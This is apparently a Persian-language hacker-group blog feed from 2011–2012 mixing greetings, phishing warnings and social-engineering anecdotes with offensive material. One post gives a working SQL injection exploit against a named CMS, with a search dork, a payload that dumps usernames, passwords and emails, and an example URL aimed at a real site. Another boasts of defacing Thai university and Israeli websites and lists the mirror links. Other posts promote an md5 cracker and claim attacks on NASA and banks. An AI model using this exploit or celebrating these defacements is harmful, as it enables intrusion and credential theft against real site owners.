ANTI NETWORK SECURITY TEAM

سال ۱۳۹۱ مبارک باد

Ali.Erroor — Sat, 31 Mar 2012 21:13:17 +0000

با عرض تبریک به مناسبت سال جدید ( سال ۱۳۹۱ ) که سال نهنگ هست به همه ی بازدیدکنندگان ، و ایرانیان تبریک عرض میکنیم

جایی داره اینجا از دوستان و بازدید کنندگان که ما را یاری کردن تا به اینجا .تشکر کنم که اگه بخواهم اسم و نام ببرم باید تا فردا صبح فقط باید اسم نام ببرم
بعد هم یکی میگه اسم من را گفتی .. یکی میگه نگفتی.. پس بهتره بگم تشکر از همه ای دوستان و اشنایان…

انشالاه امسال سال خوبی برای همه ای دوستان و اشنایان و همه ای ایرانی های عزیز باشه
سعی میکنم امسال هم با خبر های خوب به استقبالتون بیام

خداوندا تقدیر دوستان را در سال آینده به گونه ای قرار بده که در پایان سال

از گذشته خود افسوس نخورند . . .

سال جدید مبارک ” مدیریت سایت انتی نتورک”

new exploit by ali.erroor

Ali.Erroor — Sun, 25 Mar 2012 15:34:55 +0000

یک cms پیدا کردم که باگ اینجکت داشت

اکسپلویتش کردم و رپورتش کردم

برای دوستان هم میزارم

sql injection هست

لینک این اکسپلویت

http://packetstormsecurity.org/files/111166/laoy8-xss.txt

اینم یک اکسپلویت دیگه
##############################
# Exploit Title: Content-Management-System Remote SQL Injection (news.php)
# Script Page : http://tim-hendriks.com
# Date: 24-3-2012
# Version: Version 2.1
# Author : Ali.Erroor
# Tested on: Firefox 8.0, Palemoon 8.0, Internet Explorer 9
# Mail: ali.erroor@att.net
# Web Site : www.anti-network.net
#############################

## Injection Point : /news.php?id=-9 [ SQL ]

## Dork: intext:”Powered by Content-Management-System ” © Tim Hendriks 2008 ” + inurl:news.php?id=

## Exploit Code: /news.php?id=-9 union select 1,2,3,4,group_concat(username,0x3a,pass,0x3a,email))from cms_users–

## Example: http://www.boom-trikes.de/news.php?id=-9 union select 1,2,3,4,group_concat(username,0x3a,pass,0x3a,email))from cms_users–

## Login Admin Panel : http://server/cms/

#############################

## Greets To :

BARBOD And all of your friends

THANKS TO ALL Iranian HackerZ ./Persian Gulf

وقتی در سایت وب گردی اخبار ۲۰:۳۰ ali.erroor دوازده ساله میشود!!!!

Ali.Erroor — Sun, 25 Mar 2012 10:42:08 +0000

راستش من نمیدونم کی ۱۲ سالم شده که خودم خبر ندارم ؟!!!!!

لینک پروژه ای اول مهر من بازتاب گشترده ای در رسانه ها و روزنامه ها داشت

بعد از باز تاب این خبر که لینک این بازتاب و مساحبه ای من با پایگاه “شیعه انلاین” را میتونید از این لینک ببینید

http://www.anti-network.net/archives/35

بعد از گذشت مدتی متوجه شدم این پروژه ای طنز پاش به سایت وب گردی اخبار ۲۰:۳۰ شبکه ای ۲ سیما م باز شده

رفتم اخبارش را خوندم و کلی تعجب کردم !!! دیدم نوشته شده که :

به نقل از سایت وب گردی اخبار ۲۰:۳۰ :
بیانیه مهم گروه سلطنت طلب عقاب ! + عکس
گروه سلطنت طلب عقاب به لیدری مهدی روحانی قرار بود امروز اول مهر به تهران بیاید تا به اصطلاح خودش اقدامی برادازانه کند ولی ساعتی پیش که از وی خبری نشد سایت رسمی این گروهک یک نفره این بیانیه جالب را منتشر کرد

گفته می شود سایت یاد شده (سایت رسمی گروه عقاب به لیدری تیمسار!!؟ روحانی )توسط یک نوجوان ۱۲ ساله اصفهانی برای سرگرمی هک شده است.

حالا یک سوال ؟ : من کی ۱۲ سالم بوده که خودم خبر نداشتم ؟!!!
البته این مورد را من گزارش دادم
یک بار دیگه هم یک جا همین اشتباه پیش امده بود..
امیدوارم از این اشتباه ها دیگه نیافته
البته یک کلیپ هم توی لینک زیر هست که من خودم کلی خندیدم

پیشنهاد میکنم حتما ببینید…
لینک این خبر از خود سایت وب گردی

http://www.webgardi2030.ir/fa/news/4301

عکسی از صفحه:

با ما هم بله؟!!!

Ali.Erroor — Thu, 01 Mar 2012 20:03:24 +0000

راستش خیلی وقت بود که تصمیم داشتم یک چنین مطلبی بنویسم..
اما امروز دیگه گفتم برای ان شخص الافی که از طریق مهندسی اجتماعی یک مدتی هست برای ما از روش های گوناگون ( فیک پیج) و غیره…
به ما لینک میده این مطلب را بنویسم ! شاید بنهده خدا از رو رفت که بعید میدونم !
بیشترین دلیلی که برای نوشتن این مطلب دارم این نکته هست که دوست دارم کسانی که با این متود یا روش ها اسنایی ندارن
از این طریق هک نشوند…
اما اصل داستان….
داستان از این قراره که یک مدتی هست ایمیل های زیادی برای من میاد مثل تصویر زیر

تصویر بالا میگه که پسورد شما مشکل داره و به ۱۲۳۴۵۶ تغییر بدید
منم ایمیل زدم به یارو که عوض کردم به loool …!!
داستان این ایمیل از این قراره که طرف به من یک فیک میل از ادمین گوگل زده که پسوردت را به این تعییر بده تا مشکی پیش نیاد
و به نظر خودش فکر میکنه که من الان اینقدر مثل خودش خر تشریف دارم که بیام یک همچین خریتی بکنم و طرف بره با خیال راحت پسورد ما را عوض کنه

البطه من موندم ان احمقی که این را فرستاده نفهمیده بایا من خودم این درس ها را به ملت دادم
یعنی من خودم از همچین روشی ایدیم میخوره !!؟!
پا ورقی : من میوندم ان اقا خره که این را میفرسته یکم به مغز کوچیکش این را در نظر نمیگیره که admin@google چه ربطی به اکانت من که @att.net هست داره ؟!!
اگه روزی فهمیدم این طرف کی هست حتما ازش میپرسم مال کدوم شهر هست که از این به بعد نگم خر را از قبرس میارن ! بگم از شهر همون اقای که این را فرستاده میارن!
حتی نمونه های دیگه ای هر روز به دست من میرسه مثل این یکی در تصویر زیر که ازمون خواهش کرده که با دستهای نا قابل خودمون یوسر و پسورد ایدیمون را نثار روح پدر و …. بکنیم

البطه از این ایمیل ها به صورت زیادی هر روز واسه ای من ارسال میشه که اگه بخوام به همشون اشاره کنم پست به جاهای انحرافی کشیده میشه

امیدوارم از این مطالب چیزی یاد بگیرید ( انهایی که سر رشته ندارن از این چیزا )
و اینکه ان اقا خره هم که این ها را برای من ارسال میکنه بهش میگم : رو را برم ! سنگه پا قزوینه !!

گوگل به مایکروسافت هم امان نداد!

Ali.Erroor — Sat, 25 Feb 2012 20:14:54 +0000

به گزارش تیم امنیتی “انتی نتورک” این دومین مورد از تجاوز عینی “گوگل” به حریم شخصی کاربران مرورگرهای اینترنتی دیگر است. چند روز قبل مشخص شده بود که گوگل رویه مشابهی را در قبال کاربران مرورگر “سفری” که از خدمات این شرکت استفاده می کردند، اتخاذ کرده است.

“دین هاچموییچ” معاون اول واحد مرورگر شرکت مایکروسافت با تایید این خبر گفته است: «ما به تازگی پی برده ایم که گوگل تنظیمات حریم شخصی سفری را دست‌کاری کرده است. بعد به فکر افتادیم که ممکن است گوگل این کار را در مورد تنظمیات حریم شخصی مرورگر اینترنتی “Internet Explorer” هم انجام داده باشد.»

وی می افزاید: «بعد از مدتی بررسی متوجه شدیم که این خبر درست است و گوگل از روش های مشابهی برای دستکاری تنظیمات پیش فرض حریم شخصی در Internet Explorer و دستکاری کوکی های این مرورگر و بررسی آن ها استفاده کرده است.»

بر اساس بررسی های مایکروسافت گوگل به طور گسترده از کوکی های Internet Explorer برای بررسی عملکرد کاربران این مرورگر سوءاستفاده کرده است. این شرکت برای متوقف کردن سوءاستفاده های گوگل تنظیمات IE9 را به روز کرده است.

مهندسی اجتماعی

Ali.Erroor — Wed, 28 Dec 2011 20:21:18 +0000

شاید تا به حال راه کار های زیادی در اینترنت دیده باشید…
میخواهم یک خاطره ای شخصی از خودم بگم…
قدیما که بچه بودیم میرفتیم شارژ میگرفتیم از پسر های توی اینترنت

وب رکورد شده ای از دختر ها که زیاد هست توی اینترنت دانلود میکردیم و با یک ایدی دخترانه میرفتیم توی روم ها و میگفتیم شارژ بده تا بهت وب بدم
پسر های زرنگ هم زودی شارژ میدادن و کلی کیف میکردن از وب رکورد شده و فکر میکردن ما دختریم !

خلاصه ………. امروز یک چیزه جالب دیدم خواستم راجبش یک مطلبی بنویسم

شاید بعضی از پسر ها با دیدن این پیام به فکر زدن مخ یا شاید دلشون بسوزه واسه کسی که این پیام را فرستاده و یک شارژ بدن به کسی که این پیام را فرستاده…

تصویر :

اما قضیه از این قراره که طرف میاد و سعی میکنه با گفتن این حرف ها یک شارژ از کسی کش بره..
والا این چه زندانی هست که توش موبایل و اینترنت و کامپیوتر وجود داره و مهمتر از همه این اینترنت یا از موبایل هست یا از خط تلفن ! بعد یعنی اینقدر سخت هست زدن یک زنگ به پلیس ؟!!
این واقعا تهش بود !! اخر دروغ بود ! اما نکته ای جالبش اینجاست که بعضی ها گول میخورند…
ادم واقعا باید احمق باشه که گول همچین افرادی را بخوره !
چون دیدم این پیام به صورت گسترده توی اینترنت موجب این شده که بعضی ها مردم را سر کیسه میکنن تصمیم گرفتم این مطلب را بنویسم
در مطالب بعدی بیشتر راجب این موضوعات بحث میکنم

پا ورقی :
چقدرم که کسی نمیدونه زنگ زدن به پلیس ۱۱۰ رایگانه !!!
و اینکه من نمیدونم طرف شارژ داره به شما این اس ام اس را یا از طریق اینترنت و یا موبایل این پیام را بده ! اما نمیتونه یک زنگ را به پلیس بزنه !!
این ها هم یک جور روش های مهندسی اجتماعی حساب میشن..!

zone-h script

Ali.Erroor — Wed, 28 Dec 2011 13:02:37 +0000

امروز میخوام یک اسکریپت را بهتون معرفی کنم

این اسکریپت که توسط هکر های ترک نوشته شده و شبیه zone-h هست

تصویری از نمایی این اسکریپت


این اسکریپت فقط به صورت پولی فروخته میشه
جهت خرید این اسکریپت از اینجا درخواست دهید



هک بیش از ۱۰ سایت دانشگاه تایلند و اسـرائیـلی
Ali.Erroor — Fri, 23 Dec 2011 14:48:24 +0000
برای اینکه یک مدتی هست اصلان خبر های دیفیس نمیزنم
گفتم امروز یک خبری بزارم
امروز بیش از ۱۰ وب سایت دانشگاه هایی تایلند و بیش از ۱۰ وب سایت سـرائیـلی هک کردم
لینک دیفیس های دانشگاه های تایلند
 
 
 
 
 
 
 
 
 
 
 
 
 
 
http://mahatai.ac.th/403.htm
http://khuanplangu.ac.th/403.htm
http://jp.ac.th/403.htm
http://maewongpit.ac.th/403.htm
http://nakhupat.ac.th/403.htm
http://swdw.ac.th/403.htm
http://haruethai.ac.th/403.htm
http://bkkn.ac.th/403.htm
http://pangkenpittaya.ac.th/403.htm
و اینم لینک اثبات هک شدن این سایت ها
http://zone-h.org/mirror/id/16396124
http://zone-h.org/mirror/id/16396125
http://zone-h.org/mirror/id/16396131
http://zone-h.org/mirror/id/16396130
http://zone-h.org/mirror/id/16396129
http://zone-h.org/mirror/id/16396127
http://zone-h.org/mirror/id/16396126
http://zone-h.org/mirror/id/16396128
http://zone-h.org/mirror/id/16396123
http://zone-h.org/mirror/id/16396041
و در ادامه لینک اثبات هک شدن بیش از ۱۰ وب سایت اسـرائیـلی
http://www.zone-h.org/mirror/id/15827681
http://www.zone-h.org/mirror/id/15827680
http://www.zone-h.org/mirror/id/15827679
http://www.zone-h.org/mirror/id/15827678
http://www.zone-h.org/mirror/id/15827677
http://www.zone-h.org/mirror/id/15827676
http://www.zone-h.org/mirror/id/15827675
http://www.zone-h.org/mirror/id/15827674
http://www.zone-h.org/mirror/id/15827673
http://www.zone-h.org/mirror/id/15827672
 
موفق باشید



md5 cracker online
Ali.Erroor — Thu, 22 Dec 2011 00:16:24 +0000
چند وقتی هست یکم سرم شلوغه

امروز تصمیم گرفتم یک مطلب بنویسم

امروز میخوام به شما یک کراکر انلاین که خودم ادیتش کردم را معرفی کنم
این کراکر پسورد های هاش شده به زبان md5  را براتون کراک میکنه را به شما معرفی کنم
این اسکریپ تست شده هست و کاملا کار میکنه
طرز کارش هم به این صورت هست که با چنیدن کراکر انلاین براتون ان هاش پسورد را چک میکنه که اشتباهی به وجود نیاد
البطه فعلان این اسکریپ با ۴ تا کراکر انلاین تست میکنه که به زودی کراکر های دیگه ای هم بهش اضافه میکنم
برای استفاده از این کراکر میتونید از لین زیر استفاده کنید
لینک
http://www.anti-network.net/md5/md5.php



ضعیف ترین ها و قوی ترین های دنیای اینترنت
Ali.Erroor — Mon, 19 Dec 2011 18:04:36 +0000
با این که قبلان هم مطلب نوشته بودم در این مورد اما امروز میخوام یک بحث دیگه در مورد افراد اینترنت بکنم.

گاهی پیش امده که افراد میرن توی روم های چت و در انجا برای حالا تفریح یا سر گرمی یا هر چیزه دیگه ای میرن بحث بکنند. اما در این میان افرادی هستند به نام بوتر های یاهو. که از نظر ما افراد بسیار ضعیفی هستند.لازم دونستم مطلبی را عنوان کنم.

من به ندرت میرم توی روم یا چت رومها چون نه وقت چت دارم و نه خوشم میاد از چت روم ها.من یک فیک پیج اماده کرده بودم که برم توی روم ها و تاثیر ان را روی ایمیل های یاهو مشاهده کنم که یک شخصی من را بوت کرد.

حالا بوت چی هست ؟ بوتر به معنایی نرم افزاری است که با اسپم های زیاد یک ایدی را از روم خارج میکنه. و ان ایدی دوباره از نو باید به روم بره. به این عملیات میگن بوت و شخصی که این کار را انجام میده اسمش بوتر یاهو است.

خلاصه من باز رفتم به ان روم و به کسی که بوت کرد ایدی من را گفتم خیلی بزرگی….! کاری کردی که توی اینترنت هیچ کسی قادر به انجامش نیست..!!

از ان فرد چند سوال ساده کردم که ان شخص علم و دانش این سوالها را نداشت که بفهمه اصلان بوتر چرا یک ایدی را بوت میکنه. خلاصه بعد از این که دیدم با یک ادم بی سواد طرف هستم بهش گفتم.ما که شاید سابقه ای حمله به سایت ناسا / سایت وزارت امور خارجه امیرکا / یکی از ساب دمین های ایرانسل و یکی از بانک ها و سایت …………. را و هزاران سایت و کار و تحقیقاته دیگه را داشتیم به اندازه ای شما ادعا نکردیم ! حالا این چه صیقه ای هست که شما که به اندازه ای یک هزارم ما دانش و علم اینترنت را ندارید چرا ادعایی الکی میکنید

حالا قضاوت به عهده ای کاربران سایت میباشد که تشخیص بدهند چه کسی قدرتمند تر و چه کسی نادانتر است..

پا ورقی : امیدوارم هیچ یکی از خواننده گان سایت من دنبال این بچه بازی ها نرن چون وقت خودشون را که تلف میکنن هیچ ! تازه به هیچ جا هم نمیرسن. کسی که با نرمافزار ادعایی قدرت میکنه هیچ وقت به هیچ جایی نمیرهسه ! قدرت برتر از ان کسی است که بدون هیچ نرمافزاری بتونه کار های انجام بده که هر کس از عهدش بر نمیان !